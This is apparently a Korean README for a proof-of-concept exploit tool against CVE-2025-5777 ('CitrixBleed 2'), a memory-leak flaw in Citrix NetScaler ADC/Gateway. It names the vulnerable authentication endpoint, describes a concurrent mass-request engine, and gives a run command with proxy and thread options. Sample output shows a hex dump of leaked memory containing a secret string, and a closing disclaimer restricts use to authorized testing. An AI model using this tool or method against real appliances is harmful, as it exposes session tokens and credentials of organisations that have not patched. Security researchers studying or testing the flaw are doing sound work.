
Citrix NetScaler 메모리 누수 PoC
이 스크립트는 CVE-2025-5777(CitrixBleed 2로 명명됨)로 식별된 Citrix NetScaler ADC/Gateway 장비의 심각한 메모리 공개 취약점을 악용합니다. /p/u/doAuthentication.do 엔드포인트를 통해 메모리 누수를 트리거하여 XML 조각, 토큰, 잠재적 자격 증명과 같은 민감한 데이터가 포함된 초기화되지 않은 메모리를 노출시킵니다.
aiohttp를 사용한 비동기aiohttp, coloramaasyncio + aiohttp를 사용한 비동기 대량 요청 엔진<InitialValue> 메모리 누수 자동 탐지python3 CVE-2025-5777.py http://<target> [options]
| 옵션 | 설명 |
|---|---|
-v, --verbose | 상세 디버그 출력 활성화 |
-p <proxy> | HTTP 프록시 사용 (예: http://127.0.0.1:8080) |
-t <threads> | 동시 요청 수 (기본값: 10) |
python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
_____________ _______________ _______________ ________ .________ .___________________________________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \ | ____/ | ____/\______ \______ \______ \
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ |____ \ ______ |____ \ / / / / / /
\ \____\ / | \ /_____/ / \ \_/ \/ \ / \ /_____/ / \ / / / / / /
\______ / \___/ /_______ / \_______ \_____ /\_______ \/______ / /______ / /____/ /____/ /____/
\/ \/ \/ \/ \/ \/ \/
Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
Author: 0xgh057r3c0n
[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → 상태: 200
[✔️ ] InitialValue 메모리 누수 발견!
[🧠] 16진수 덤프:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21 secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74 @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e ialValue>
------------------------------------------------------------------------
[✔️ ] 누수 확인됨. 추출 계속 중...
이 개념 증명은 교육 목적 및 승인된 보안 테스트용으로만 제공됩니다. 소유하지 않은 시스템을 무단으로 스캔하거나 악용하는 것은 불법입니다.